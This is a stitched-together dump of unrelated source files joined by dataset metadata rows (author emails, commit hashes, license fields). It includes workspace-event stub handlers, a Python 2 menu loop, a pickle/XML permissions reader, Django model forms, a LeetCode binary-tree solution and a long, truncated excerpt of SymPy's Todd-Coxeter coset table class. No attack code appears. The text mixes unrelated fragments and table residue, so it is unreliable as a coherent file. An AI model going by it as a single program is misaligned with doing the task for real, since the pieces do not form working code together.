exists = check_doc_existence(_id)
if not exists:
_import_obj(msg)
def _delete_obj(msg):
"""Handle an object deletion event (OBJECT_DELETE_STATE_CHANGE)"""
log('INFO', '_delete_obj TODO') # TODO
raise NotImplementedError()
def _delete_ws(msg):
"""Handle a workspace deletion event (WORKSPACE_DELETE_STATE_CHANGE)."""
log('INFO', '_delete_ws TODO') # TODO
raise NotImplementedError()
def _import_ws(msg):
"""Import all data for an entire workspace."""
log('INFO', '_import_ws TODO') # TODO
raise NotImplementedError()
def _set_global_perms(msg):
"""Set permissions for an entire workspace (SET_GLOBAL_PERMISSION)."""
log('INFO', '_set_global_perms TODO') # TODO
raise NotImplementedError()
| [
"jayrbolton@gmail.com"
] | jayrbolton@gmail.com |
7a93ea17532155af61fa6a4e41ee4610814e7864 | aaaa16d4de4d3a1291d2abcf0d749302474eb28a | /ex40(3).py | 7d1b164829f9a50300fbdf507cbbef8dd5d4a284 | [] | no_license | A-lPha/-python- | 6f2ae557919db3dc87cce398c4800fadf4c24c2c | f9996781e9198d75c2ff1dbaa0bc508b0446e046 | refs/heads/master | 2021-01-12T08:25:03.622928 | 2016-12-15T14:58:02 | 2016-12-15T14:58:02 | 76,568,773 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 158 | py | while True:
cmd = raw_input("""
1.User information
2.Setup
3.Exit
""")
print "您输入的是",cmd
#帮群里一个新手解决的问题
| [
"noreply@github.com"
] | noreply@github.com |
81f995d260348ae063f7f2e60b454ad287d540e5 | 28871da79ccc0e0200a69fd629ff71de48d5b8ac | /read_log_xml_permission_file.py | 1ca06476423eb600e8d974e8193cde711b4aac98 | [] | no_license | maijaz01/django_blog | 2ffbf2537871e8da5c317d085bbc8570fa76431f | ebd91b868ebca56f1d5224ba279c706a47f98888 | refs/heads/master | 2016-09-06T02:49:43.044275 | 2015-09-07T15:12:02 | 2015-09-07T15:12:02 | 32,886,539 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,739 | py | import os
import pickle
import xml.etree.ElementTree as ET
class Permission(object):
def read_file(self):
""" This method will read file extention and call to respective method to get result
"""
cur_dir = os.path.dirname(__file__)
permissions_log = os.path.join(cur_dir, "permissions.xml")
if permissions_log.split('.')[1]=='log':
self.getLogFile(permissions_log)
else:
self.getXMLFile(permissions_log)
def getLogFile(self, permissions_log):
"""This method convert pickle file and return dictionaries"""
key_dict = {}
if os.path.exists(permissions_log):
fo = open(permissions_log,'U')
file_log = pickle.load(fo)
for key, value in file_log.items():
if key[0] in key_dict.keys():
key_dict[key[0]].append({key[1]:[value]})
else:
key_dict[key[0]] = [{key[1]:[value]}]
print key_dict
def getXMLFile(self, permissions_log):
"""This method read the xml file and convert into dictionaries
"""
xml_dict = {}
if os.path.exists(permissions_log):
fo = open(permissions_log,'U')
xml_obj = ET.parse(fo)
root = xml_obj.getroot()
for child in root:
for item in child.findall("Item"):
if child.tag in xml_dict.keys():
xml_dict[child.tag].append({item.items()[1][1]:[item.text]})
else:
xml_dict[child.tag]=[{item.items()[1][1]:[item.text]}]
print xml_dict
if __name__=="__main__":
Permission=Permission()
Permission.read_file()
| [
"maijaz@zeomega.com"
] | maijaz@zeomega.com |
ab2ba507d79c1f6cd39af6514a155a35cc16393b | 18b452faa903176e5f0414aa1ae8b99097cc89b8 | /main_app/forms.py | 3549de084218a6587ea84d952a77617bf2a2837e | [] | no_license | th3dougler/collectorcollector | a6c237ed2ebb94d0f4ae8bb7aa4046893b90b1c0 | b0b815b010557e447cc0cec3bb9af78ebe4ef7bf | refs/heads/main | 2023-04-08T15:09:40.823298 | 2021-04-02T02:15:18 | 2021-04-02T02:15:18 | 352,772,726 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 298 | py | from django.forms import ModelForm
from .models import WhatGoesIn, Common_Feature
class WhatGoesInForm(ModelForm):
class Meta:
model = WhatGoesIn
fields = ['name', 'colour']
class CommonFeatureForm(ModelForm):
class Meta:
model = Common_Feature
fields = ['name'] | [
"th3dougler@gmail.com"
] | th3dougler@gmail.com |
9116fbcd17562627c4d5504fdc5b28015b3d830d | 6fe2d3c27c4cb498b7ad6d9411cc8fa69f4a38f8 | /algorithms/algorithms-python/leetcode/Question_111_Minimum_Depth_of_Binary_Tree.py | 20e53e489f88b9f32c07604bd8be49b4895f2660 | [] | no_license | Lanceolata/code | aae54af632a212c878ce45b11dab919bba55bcb3 | f7d5a7de27c3cc8a7a4abf63eab9ff9b21d512fb | refs/heads/master | 2022-09-01T04:26:56.190829 | 2021-07-29T05:14:40 | 2021-07-29T05:14:40 | 87,202,214 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 566 | py | #!/usr/bin/python
# coding: utf-8
from TreeNode import *
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
def minDepth(self, root):
"""
:type root: TreeNode
:rtype: int
"""
if not root:
return 0
left = self.minDepth(root.left)
right = self.minDepth(root.right)
return left + right + 1 if left == 0 or right == 0 else min(left, right) + 1
| [
"lanceolatayuan@gmail.com"
] | lanceolatayuan@gmail.com |
ec9388dc3dd1fce8c32eb599783e32c21d108f8a | 00a9295409b78a53ce790f7ab44931939f42c0e0 | /FPGA/apio/iCEBreaker/FIR_Filter/sympy/venv/lib/python3.8/site-packages/sympy/combinatorics/coset_table.py | 9e9b2b0f7ecf107a58a2d1ab311db0f412135e86 | [
"Apache-2.0"
] | permissive | klei22/Tech-OnBoarding-Class | c21f0762d2d640d5e9cb124659cded5c865b32d4 | 960e962322c37be9117e0523641f8b582a2beceb | refs/heads/master | 2022-11-10T13:17:39.128342 | 2022-10-25T08:59:48 | 2022-10-25T08:59:48 | 172,292,871 | 2 | 3 | Apache-2.0 | 2019-05-19T00:26:32 | 2019-02-24T03:50:35 | C | UTF-8 | Python | false | false | 42,977 | py | from sympy.combinatorics.free_groups import free_group
from sympy.printing.defaults import DefaultPrinting
from itertools import chain, product
from bisect import bisect_left
###############################################################################
# COSET TABLE #
###############################################################################
class CosetTable(DefaultPrinting):
    # Glossary for the names used throughout this class:
    # coset_table: Mathematically a coset table
    # represented using a list of lists
    # alpha: Mathematically a coset (precisely, a live coset)
    # represented by an integer between i with 1 <= i <= n
    # alpha in c
    # x: Mathematically an element of "A" (set of generators and
    # their inverses), represented using "FpGroupElement"
    # fp_grp: Finitely Presented Group with < X|R > as presentation.
    # H: subgroup of fp_grp.
    # NOTE: We start with H as being only a list of words in generators
    # of "fp_grp". Since `.subgroup` method has not been implemented.
    r"""
    A coset table for the Todd-Coxeter coset enumeration procedure.

    Properties
    ==========

    [1] `0 \in \Omega` and `\tau(1) = \epsilon`
    [2] `\alpha^x = \beta \Leftrightarrow \beta^{x^{-1}} = \alpha`
    [3] If `\alpha^x = \beta`, then `H \tau(\alpha)x = H \tau(\beta)`
    [4] `\forall \alpha \in \Omega, 1^{\tau(\alpha)} = \alpha`

    References
    ==========

    .. [1] Holt, D., Eick, B., O'Brien, E.
           "Handbook of Computational Group Theory"

    .. [2] John J. Cannon; Lucien A. Dimino; George Havas; Jane M. Watson
           Mathematics of Computation, Vol. 27, No. 123. (Jul., 1973), pp. 463-490.
           "Implementation and Analysis of the Todd-Coxeter Algorithm"

    """
    # default limit for the number of cosets allowed in a
    # coset enumeration.
    coset_table_max_limit = 4096000
    # limit for the current instance (set per-instance in ``__init__``)
    coset_table_limit = None
    # maximum size of deduction stack above or equal to
    # which it is emptied
    max_stack_size = 100
def __init__(self, fp_grp, subgroup, max_cosets=None):
if not max_cosets:
max_cosets = CosetTable.coset_table_max_limit
self.fp_group = fp_grp
self.subgroup = subgroup
self.coset_table_limit = max_cosets
# "p" is setup independent of Omega and n
self.p = [0]
# a list of the form `[gen_1, gen_1^{-1}, ... , gen_k, gen_k^{-1}]`
self.A = list(chain.from_iterable((gen, gen**-1) \
for gen in self.fp_group.generators))
#P[alpha, x] Only defined when alpha^x is defined.
self.P = [[None]*len(self.A)]
# the mathematical coset table which is a list of lists
self.table = [[None]*len(self.A)]
self.A_dict = {x: self.A.index(x) for x in self.A}
self.A_dict_inv = {}
for x, index in self.A_dict.items():
if index % 2 == 0:
self.A_dict_inv[x] = self.A_dict[x] + 1
else:
self.A_dict_inv[x] = self.A_dict[x] - 1
# used in the coset-table based method of coset enumeration. Each of
# the element is called a "deduction" which is the form (alpha, x) whenever
# a value is assigned to alpha^x during a definition or "deduction process"
self.deduction_stack = []
# Attributes for modified methods.
H = self.subgroup
self._grp = free_group(', ' .join(["a_%d" % i for i in range(len(H))]))[0]
self.P = [[None]*len(self.A)]
self.p_p = {}
@property
def omega(self):
"""Set of live cosets. """
return [coset for coset in range(len(self.p)) if self.p[coset] == coset]
def copy(self):
"""
Return a shallow copy of Coset Table instance ``self``.
"""
self_copy = self.__class__(self.fp_group, self.subgroup)
self_copy.table = [list(perm_rep) for perm_rep in self.table]
self_copy.p = list(self.p)
self_copy.deduction_stack = list(self.deduction_stack)
return self_copy
def __str__(self):
return "Coset Table on %s with %s as subgroup generators" \
% (self.fp_group, self.subgroup)
__repr__ = __str__
@property
def n(self):
"""The number `n` represents the length of the sublist containing the
live cosets.
"""
if not self.table:
return 0
return max(self.omega) + 1
# Pg. 152 [1]
def is_complete(self):
r"""
The coset table is called complete if it has no undefined entries
on the live cosets; that is, `\alpha^x` is defined for all
`\alpha \in \Omega` and `x \in A`.
"""
return not any(None in self.table[coset] for coset in self.omega)
# Pg. 153 [1]
def define(self, alpha, x, modified=False):
r"""
This routine is used in the relator-based strategy of Todd-Coxeter
algorithm if some `\alpha^x` is undefined. We check whether there is
space available for defining a new coset. If there is enough space
then we remedy this by adjoining a new coset `\beta` to `\Omega`
(i.e to set of live cosets) and put that equal to `\alpha^x`, then
make an assignment satisfying Property[1]. If there is not enough space
then we halt the Coset Table creation. The maximum amount of space that
can be used by Coset Table can be manipulated using the class variable
``CosetTable.coset_table_max_limit``.
See Also
========
define_c
"""
A = self.A
table = self.table
len_table = len(table)
if len_table >= self.coset_table_limit:
# abort the further generation of cosets
raise ValueError("the coset enumeration has defined more than "
"%s cosets. Try with a greater value max number of cosets "
% self.coset_table_limit)
table.append([None]*len(A))
self.P.append([None]*len(self.A))
# beta is the new coset generated
beta = len_table
self.p.append(beta)
table[alpha][self.A_dict[x]] = beta
table[beta][self.A_dict_inv[x]] = alpha
# P[alpha][x] = epsilon, P[beta][x**-1] = epsilon
if modified:
self.P[alpha][self.A_dict[x]] = self._grp.identity
self.P[beta][self.A_dict_inv[x]] = self._grp.identity
self.p_p[beta] = self._grp.identity
def define_c(self, alpha, x):
r"""
A variation of ``define`` routine, described on Pg. 165 [1], used in
the coset table-based strategy of Todd-Coxeter algorithm. It differs
from ``define`` routine in that for each definition it also adds the
tuple `(\alpha, x)` to the deduction stack.
See Also
========
define
"""
A = self.A
table = self.table
len_table = len(table)
if len_table >= self.coset_table_limit:
# abort the further generation of cosets
raise ValueError("the coset enumeration has defined more than "
"%s cosets. Try with a greater value max number of cosets "
% self.coset_table_limit)
table.append([None]*len(A))
# beta is the new coset generated
beta = len_table
self.p.append(beta)
table[alpha][self.A_dict[x]] = beta
table[beta][self.A_dict_inv[x]] = alpha
# append to deduction stack
self.deduction_stack.append((alpha, x))
def scan_c(self, alpha, word):
"""
A variation of ``scan`` routine, described on pg. 165 of [1], which
puts at tuple, whenever a deduction occurs, to deduction stack.
See Also
========
scan, scan_check, scan_and_fill, scan_and_fill_c
"""
# alpha is an integer representing a "coset"
# since scanning can be in two cases
# 1. for alpha=0 and w in Y (i.e generating set of H)
# 2. alpha in Omega (set of live cosets), w in R (relators)
A_dict = self.A_dict
A_dict_inv = self.A_dict_inv
table = self.table
f = alpha
i = 0
r = len(word)
b = alpha
j = r - 1
# list of union of generators and their inverses
while i <= j and table[f][A_dict[word[i]]] is not None:
f = table[f][A_dict[word[i]]]
i += 1
if i > j:
if f != b:
self.coincidence_c(f, b)
return
while j >= i and table[b][A_dict_inv[word[j]]] is not None:
b = table[b][A_dict_inv[word[j]]]
j -= 1
if j < i:
# we have an incorrect completed scan with coincidence f ~ b
# run the "coincidence" routine
self.coincidence_c(f, b)
elif j == i:
# deduction process
table[f][A_dict[word[i]]] = b
table[b][A_dict_inv[word[i]]] = f
self.deduction_stack.append((f, word[i]))
# otherwise scan is incomplete and yields no information
# alpha, beta coincide, i.e. alpha, beta represent the pair of cosets where
# coincidence occurs
def coincidence_c(self, alpha, beta):
"""
A variation of ``coincidence`` routine used in the coset-table based
method of coset enumeration. The only difference being on addition of
a new coset in coset table(i.e new coset introduction), then it is
appended to ``deduction_stack``.
See Also
========
coincidence
"""
A_dict = self.A_dict
A_dict_inv = self.A_dict_inv
table = self.table
# behaves as a queue
q = []
self.merge(alpha, beta, q)
while len(q) > 0:
gamma = q.pop(0)
for x in A_dict:
delta = table[gamma][A_dict[x]]
if delta is not None:
table[delta][A_dict_inv[x]] = None
# only line of difference from ``coincidence`` routine
self.deduction_stack.append((delta, x**-1))
mu = self.rep(gamma)
nu = self.rep(delta)
if table[mu][A_dict[x]] is not None:
self.merge(nu, table[mu][A_dict[x]], q)
elif table[nu][A_dict_inv[x]] is not None:
self.merge(mu, table[nu][A_dict_inv[x]], q)
else:
table[mu][A_dict[x]] = nu
table[nu][A_dict_inv[x]] = mu
    def scan(self, alpha, word, y=None, fill=False, modified=False):
        r"""
        ``scan`` performs a scanning process on the input ``word``.
        It first locates the largest prefix ``s`` of ``word`` for which
        `\alpha^s` is defined (i.e is not ``None``), ``s`` may be empty. Let
        ``word=sv``, let ``t`` be the longest suffix of ``v`` for which
        `\alpha^{t^{-1}}` is defined, and let ``v=ut``. Then three
        possibilities are there:

        1. If ``t=v``, then we say that the scan completes, and if, in addition
        `\alpha^s = \alpha^{t^{-1}}`, then we say that the scan completes
        correctly.

        2. It can also happen that scan does not complete, but `|u|=1`; that
        is, the word ``u`` consists of a single generator `x \in A`. In that
        case, if `\alpha^s = \beta` and `\alpha^{t^{-1}} = \gamma`, then we can
        set `\beta^x = \gamma` and `\gamma^{x^{-1}} = \beta`. These assignments
        are known as deductions and enable the scan to complete correctly.

        3. See ``coincidence`` routine for explanation of third condition.

        Notes
        =====

        The code for the procedure of scanning `\alpha \in \Omega`
        under `w \in A*` is defined on pg. 155 [1]

        See Also
        ========

        scan_c, scan_check, scan_and_fill, scan_and_fill_c

        Scan and Fill
        =============

        Performed when the default argument fill=True: undefined entries
        encountered during the scan are defined via ``self.define`` until
        the scan completes.

        Modified Scan
        =============

        Performed when the default argument modified=True: additionally
        accumulates subgroup-word labels (from ``self.P``) along both scan
        directions and records them back into ``self.P``; ``y`` is the
        label attached to the scan in this mode.
        """
        # alpha is an integer representing a "coset"
        # since scanning can be in two cases
        # 1. for alpha=0 and w in Y (i.e generating set of H)
        # 2. alpha in Omega (set of live cosets), w in R (relators)
        A_dict = self.A_dict
        A_dict_inv = self.A_dict_inv
        table = self.table
        # f/b are the cosets reached scanning forwards/backwards so far;
        # i/j delimit the still-unscanned portion word[i..j]
        f = alpha
        i = 0
        r = len(word)
        b = alpha
        j = r - 1
        # f_p/b_p accumulate the subgroup words labelling the forward and
        # backward scans (used only when modified=True)
        b_p = y
        if modified:
            f_p = self._grp.identity
        # ``flag`` makes this a do-while: the body runs exactly once when
        # fill=False, and repeats (after defining a missing entry at the
        # bottom) as long as fill=True
        flag = 0
        while fill or flag == 0:
            flag = 1
            # scan forwards as far as the table permits
            while i <= j and table[f][A_dict[word[i]]] is not None:
                if modified:
                    f_p = f_p*self.P[f][A_dict[word[i]]]
                f = table[f][A_dict[word[i]]]
                i += 1
            if i > j:
                # scan completed; if incorrectly, the two ends name the
                # same coset, so process the coincidence
                if f != b:
                    if modified:
                        self.modified_coincidence(f, b, f_p**-1*y)
                    else:
                        self.coincidence(f, b)
                return
            # scan backwards as far as the table permits
            while j >= i and table[b][A_dict_inv[word[j]]] is not None:
                if modified:
                    b_p = b_p*self.P[b][self.A_dict_inv[word[j]]]
                b = table[b][A_dict_inv[word[j]]]
                j -= 1
            if j < i:
                # we have an incorrect completed scan with coincidence f ~ b
                # run the "coincidence" routine
                if modified:
                    self.modified_coincidence(f, b, f_p**-1*b_p)
                else:
                    self.coincidence(f, b)
            elif j == i:
                # deduction process: exactly one gap remains, so fill both
                # directions of the table and stop
                table[f][A_dict[word[i]]] = b
                table[b][A_dict_inv[word[i]]] = f
                if modified:
                    self.P[f][self.A_dict[word[i]]] = f_p**-1*b_p
                    self.P[b][self.A_dict_inv[word[i]]] = b_p**-1*f_p
                return
            elif fill:
                # scan-and-fill: define the next missing entry, then resume
                self.define(f, word[i], modified=modified)
        # otherwise scan is incomplete and yields no information
# used in the low-index subgroups algorithm
def scan_check(self, alpha, word):
    r"""
    Another version of the ``scan`` routine: it checks whether
    `\alpha` scans correctly under ``word`` and is a straightforward
    modification of ``scan``.  Instead of calling ``coincidence`` on an
    incorrectly completed scan it returns ``False``; otherwise it returns
    ``True`` (recording a deduction in the table when the scan closes with
    exactly one undefined entry).

    See Also
    ========

    scan, scan_c, scan_and_fill, scan_and_fill_c
    """
    # alpha is an integer representing a "coset"; the scan walks the word
    # forwards from the front and backwards from the back of ``word``.
    lookup = self.A_dict
    lookup_inv = self.A_dict_inv
    tbl = self.table
    forward = alpha
    backward = alpha
    lo = 0
    hi = len(word) - 1
    # forward scan: follow defined table entries as far as possible
    while lo <= hi:
        nxt = tbl[forward][lookup[word[lo]]]
        if nxt is None:
            break
        forward = nxt
        lo += 1
    if lo > hi:
        # scan completed; correct iff both ends meet at the same coset
        return forward == backward
    # forward scan was incomplete: scan backwards under inverse letters
    while hi >= lo:
        prev = tbl[backward][lookup_inv[word[hi]]]
        if prev is None:
            break
        backward = prev
        hi -= 1
    if hi < lo:
        # incorrectly completed scan with coincidence forward ~ backward;
        # report failure instead of running the coincidence routine
        return False
    if hi == lo:
        # deduction: exactly one gap remains, fill both table entries
        tbl[forward][lookup[word[lo]]] = backward
        tbl[backward][lookup_inv[word[lo]]] = forward
    return True
def merge(self, k, lamda, q, w=None, modified=False):
    """
    Merge two classes with representatives ``k`` and ``lamda``, described
    on Pg. 157 [1] (for pseudocode), start by putting ``p[k] = lamda``.
    It is more efficient to choose the new representative from the larger
    of the two classes being merged, i.e larger among ``k`` and ``lamda``.
    procedure ``merge`` performs the merging operation, adds the deleted
    class representative to the queue ``q``.

    Parameters
    ==========

    'k', 'lamda' being the two class representatives to be merged.
    q -- queue of dead cosets, to be processed further by ``coincidence``.
    w -- word in the subgroup generators; only used when ``modified`` is True.
    modified -- when True, also keep the coset-representative words ``p_p``
        of the modified (augmented) coset table consistent with the merge.

    Notes
    =====

    Pg. 86-87 [1] contains a description of this method.

    See Also
    ========

    coincidence, rep
    """
    p = self.p
    rep = self.rep
    # representatives of the classes containing k and lamda
    phi = rep(k, modified=modified)
    psi = rep(lamda, modified=modified)
    if phi != psi:
        # the smaller representative survives; the larger one dies
        mu = min(phi, psi)
        v = max(phi, psi)
        p[v] = mu
        if modified:
            # update the subgroup-generator word attached to the dead
            # representative so that p_p stays consistent (pg. 157 [1])
            if v == phi:
                self.p_p[phi] = self.p_p[k]**-1*w*self.p_p[lamda]
            else:
                self.p_p[psi] = self.p_p[lamda]**-1*w**-1*self.p_p[k]
        # queue the dead representative for processing by ``coincidence``
        q.append(v)
def rep(self, k, modified=False):
    r"""
    Parameters
    ==========

    `k \in [0 \ldots n-1]`, as for ``self`` only array ``p`` is used

    Returns
    =======

    Representative of the class containing ``k``.

    Returns the representative of `\sim` class containing ``k``, it also
    makes some modification to array ``p`` of ``self`` to ease further
    computations, described on Pg. 157 [1].

    The information on classes under `\sim` is stored in array `p` of
    ``self`` argument, which will always satisfy the property:

    `p[\alpha] \sim \alpha` and `p[\alpha]=\alpha \iff \alpha=rep(\alpha)`
    `\forall \in [0 \ldots n-1]`.

    So, for `\alpha \in [0 \ldots n-1]`, we find `rep(self, \alpha)` by
    continually replacing `\alpha` by `p[\alpha]` until it becomes
    constant (i.e satisfies `p[\alpha] = \alpha`).

    To increase the efficiency of later ``rep`` calculations, whenever we
    find `rep(self, \alpha)=\beta`, we set
    `p[\gamma] = \beta \forall \gamma \in p-chain` from `\alpha` to `\beta`

    Notes
    =====

    ``rep`` routine is also described on Pg. 85-87 [1] in Atkinson's
    algorithm, this results from the fact that ``coincidence`` routine
    introduces functionality similar to that introduced by the
    ``minimal_block`` routine on Pg. 85-87 [1].

    See Also
    ========

    coincidence, merge
    """
    p = self.p
    # follow the p-chain from k until it becomes constant: that constant
    # is the class representative
    lamda = k
    rho = p[lamda]
    if modified:
        # keep a copy of the chain so it can be re-walked below while the
        # words p_p are being accumulated
        s = p[:]
    while rho != lamda:
        if modified:
            s[rho] = lamda
        lamda = rho
        rho = p[lamda]
    if modified:
        # walk the recorded chain back towards k, compressing the path and
        # accumulating the corresponding coset-representative words p_p
        rho = s[lamda]
        while rho != k:
            mu = rho
            rho = s[mu]
            p[rho] = lamda
            self.p_p[rho] = self.p_p[rho]*self.p_p[mu]
    else:
        # plain path compression: point every chain element at lamda
        mu = k
        rho = p[mu]
        while rho != lamda:
            p[mu] = lamda
            mu = rho
            rho = p[mu]
    return lamda
# alpha, beta coincide, i.e. alpha, beta represent the pair of cosets
# where coincidence occurs
def coincidence(self, alpha, beta, w=None, modified=False):
    r"""
    The third situation described in ``scan`` routine is handled by this
    routine, described on Pg. 156-161 [1].

    The unfortunate situation when the scan completes but not correctly,
    then ``coincidence`` routine is run. i.e when for some `i` with
    `1 \le i \le r+1`, we have `w=st` with `s=x_1*x_2 ... x_{i-1}`,
    `t=x_i*x_{i+1} ... x_r`, and `\beta = \alpha^s` and
    `\gamma = \alpha^{t^{-1}}` are defined but unequal. This means that
    `\beta` and `\gamma` represent the same coset of `H` in `G`. Described
    on Pg. 156 [1].

    See Also
    ========

    scan, merge, rep
    """
    A_dict = self.A_dict
    A_dict_inv = self.A_dict_inv
    table = self.table
    # behaves as a queue of dead cosets still to be processed
    q = []
    if modified:
        self.modified_merge(alpha, beta, w, q)
    else:
        self.merge(alpha, beta, q)
    while len(q) > 0:
        gamma = q.pop(0)
        # transfer all the table information of the dead coset gamma to
        # the representative of its class
        for x in A_dict:
            delta = table[gamma][A_dict[x]]
            if delta is not None:
                # undefine the back-pointer of the dead entry
                table[delta][A_dict_inv[x]] = None
                mu = self.rep(gamma, modified=modified)
                nu = self.rep(delta, modified=modified)
                if table[mu][A_dict[x]] is not None:
                    # conflicting definition: the images must coincide
                    if modified:
                        v = self.p_p[delta]**-1*self.P[gamma][self.A_dict[x]]**-1
                        v = v*self.p_p[gamma]*self.P[mu][self.A_dict[x]]
                        self.modified_merge(nu, table[mu][self.A_dict[x]], v, q)
                    else:
                        self.merge(nu, table[mu][A_dict[x]], q)
                elif table[nu][A_dict_inv[x]] is not None:
                    if modified:
                        v = self.p_p[gamma]**-1*self.P[gamma][self.A_dict[x]]
                        v = v*self.p_p[delta]*self.P[mu][self.A_dict_inv[x]]
                        self.modified_merge(mu, table[nu][self.A_dict_inv[x]], v, q)
                    else:
                        self.merge(mu, table[nu][A_dict_inv[x]], q)
                else:
                    # no conflict: copy the definition to the live cosets
                    table[mu][A_dict[x]] = nu
                    table[nu][A_dict_inv[x]] = mu
                    if modified:
                        # keep the augmented-table words consistent
                        v = self.p_p[gamma]**-1*self.P[gamma][self.A_dict[x]]*self.p_p[delta]
                        self.P[mu][self.A_dict[x]] = v
                        self.P[nu][self.A_dict_inv[x]] = v**-1
# method used in the HLT strategy
def scan_and_fill(self, alpha, word):
    """
    A modified version of ``scan`` routine used in the relator-based
    method of coset enumeration, described on pg. 162-163 [1], which
    follows the idea that whenever the procedure is called and the scan
    is incomplete then it makes new definitions to enable the scan to
    complete; i.e it fills in the gaps in the scan of the relator or
    subgroup generator.

    See Also
    ========

    scan
    """
    # thin wrapper: ``scan`` with fill=True performs the gap-filling
    self.scan(alpha, word, fill=True)
def scan_and_fill_c(self, alpha, word):
    """
    A modified version of ``scan`` routine, described on Pg. 165 second
    para. [1], with modification similar to that of ``scan_and_fill`` the
    only difference being it calls the coincidence procedure used in the
    coset-table based method i.e. the routine ``coincidence_c`` is used.
    Every deduction made while filling is pushed onto ``deduction_stack``.

    See Also
    ========

    scan, scan_and_fill
    """
    A_dict = self.A_dict
    A_dict_inv = self.A_dict_inv
    table = self.table
    r = len(word)
    f = alpha
    i = 0
    b = alpha
    j = r - 1
    # loop until it has filled the alpha row in the table.
    while True:
        # do the forward scanning
        while i <= j and table[f][A_dict[word[i]]] is not None:
            f = table[f][A_dict[word[i]]]
            i += 1
        if i > j:
            if f != b:
                # scan completed incorrectly: f and b coincide
                self.coincidence_c(f, b)
            return
        # forward scan was incomplete, scan backwards
        while j >= i and table[b][A_dict_inv[word[j]]] is not None:
            b = table[b][A_dict_inv[word[j]]]
            j -= 1
        if j < i:
            self.coincidence_c(f, b)
        elif j == i:
            # deduction: exactly one gap, fill both table entries and
            # record the deduction for later processing
            table[f][A_dict[word[i]]] = b
            table[b][A_dict_inv[word[i]]] = f
            self.deduction_stack.append((f, word[i]))
        else:
            # more than one gap: define a new coset and keep scanning
            self.define_c(f, word[i])
# method used in the HLT strategy
def look_ahead(self):
    """
    When combined with the HLT method this is known as HLT+Lookahead
    method of coset enumeration, described on pg. 164 [1]. Whenever
    ``define`` aborts due to lack of space available this procedure is
    executed. This routine helps in recovering space resulting from
    "coincidence" of cosets.
    """
    R = self.fp_group.relators
    p = self.p
    # complete scan all relators under all cosets(obviously live)
    # without making new definitions
    for beta in self.omega:
        for w in R:
            self.scan(beta, w)
            # beta died during the scan; no point scanning it further
            if p[beta] < beta:
                break
# Pg. 166
def process_deductions(self, R_c_x, R_c_x_inv):
    """
    Processes the deductions that have been pushed onto ``deduction_stack``,
    described on Pg. 166 [1] and is used in coset-table based enumeration.

    Parameters
    ==========

    R_c_x, R_c_x_inv -- the sets of cyclic conjugates of the relators
        beginning with the generator ``x`` respectively with its inverse.

    See Also
    ========

    deduction_stack
    """
    p = self.p
    table = self.table
    while len(self.deduction_stack) > 0:
        if len(self.deduction_stack) >= CosetTable.max_stack_size:
            # stack overflowed: recover space with a lookahead pass and
            # throw away the pending deductions
            self.look_ahead()
            del self.deduction_stack[:]
            continue
        else:
            alpha, x = self.deduction_stack.pop()
            if p[alpha] == alpha:
                # scan alpha under every relator beginning with x
                for w in R_c_x:
                    self.scan_c(alpha, w)
                    if p[alpha] < alpha:
                        break
        beta = table[alpha][self.A_dict[x]]
        if beta is not None and p[beta] == beta:
            # scan the image coset under relators beginning with x**-1
            for w in R_c_x_inv:
                self.scan_c(beta, w)
                if p[beta] < beta:
                    break
def process_deductions_check(self, R_c_x, R_c_x_inv):
    """
    A variation of ``process_deductions``; it calls ``scan_check``
    wherever ``process_deductions`` calls ``scan``, described on Pg. [1].
    Returns ``False`` as soon as any scan completes incorrectly, ``True``
    once the deduction stack has been exhausted without failure.

    See Also
    ========

    process_deductions
    """
    tbl = self.table
    stack = self.deduction_stack
    while stack:
        coset, letter = stack.pop()
        # every relator beginning with ``letter`` must scan correctly
        for rel in R_c_x:
            if not self.scan_check(coset, rel):
                return False
        image = tbl[coset][self.A_dict[letter]]
        if image is not None:
            # and likewise for the image coset under the inverse letter
            for rel in R_c_x_inv:
                if not self.scan_check(image, rel):
                    return False
    return True
def switch(self, beta, gamma):
    r"""Switch the elements `\beta, \gamma \in \Omega` of ``self``, used
    by the ``standardize`` procedure, described on Pg. 167 [1].

    See Also
    ========

    standardize
    """
    cols = self.A_dict
    tbl = self.table
    for letter in self.A:
        col = cols[letter]
        # exchange the two rows, one column at a time
        tbl[gamma][col], tbl[beta][col] = tbl[beta][col], tbl[gamma][col]
        # relabel every occurrence of beta/gamma in the live rows
        for alpha in range(len(self.p)):
            if self.p[alpha] != alpha:
                continue
            entry = tbl[alpha][col]
            if entry == beta:
                tbl[alpha][col] = gamma
            elif entry == gamma:
                tbl[alpha][col] = beta
def standardize(self):
    r"""
    A coset table is standardized if when running through the cosets and
    within each coset through the generator images (ignoring generator
    inverses), the cosets appear in order of the integers
    `0, 1, \ldots, n`. "Standardize" reorders the elements of `\Omega`
    such that, if we scan the coset table first by elements of `\Omega`
    and then by elements of A, then the cosets occur in ascending order.

    ``standardize()`` is used at the end of an enumeration to permute the
    cosets so that they occur in some sort of standard order.

    Notes
    =====

    procedure is described on pg. 167-168 [1], it also makes use of the
    ``switch`` routine to replace by smaller integer value.

    Examples
    ========

    >>> from sympy.combinatorics.free_groups import free_group
    >>> from sympy.combinatorics.fp_groups import FpGroup, coset_enumeration_r
    >>> F, x, y = free_group("x, y")

    # Example 5.3 from [1]
    >>> f = FpGroup(F, [x**2*y**2, x**3*y**5])
    >>> C = coset_enumeration_r(f, [])
    >>> C.compress()
    >>> C.table
    [[1, 3, 1, 3], [2, 0, 2, 0], [3, 1, 3, 1], [0, 2, 0, 2]]
    >>> C.standardize()
    >>> C.table
    [[1, 2, 1, 2], [3, 0, 3, 0], [0, 3, 0, 3], [2, 1, 2, 1]]

    """
    A = self.A
    A_dict = self.A_dict
    # gamma is the next coset number that should appear in the scan order
    gamma = 1
    for alpha, x in product(range(self.n), A):
        beta = self.table[alpha][A_dict[x]]
        if beta >= gamma:
            if beta > gamma:
                # beta appears out of order: relabel it as gamma
                self.switch(gamma, beta)
            gamma += 1
            if gamma == self.n:
                return
# Compression of a Coset Table
def compress(self):
    """Removes the non-live cosets from the coset table, described on
    pg. 167 [1].

    The live cosets are renumbered ``0..len(omega)-1`` in increasing
    order; afterwards ``self.p`` is the identity and the table contains
    only live rows with compressed coset numbers.
    """
    gamma = -1
    A = self.A
    A_dict = self.A_dict
    table = self.table
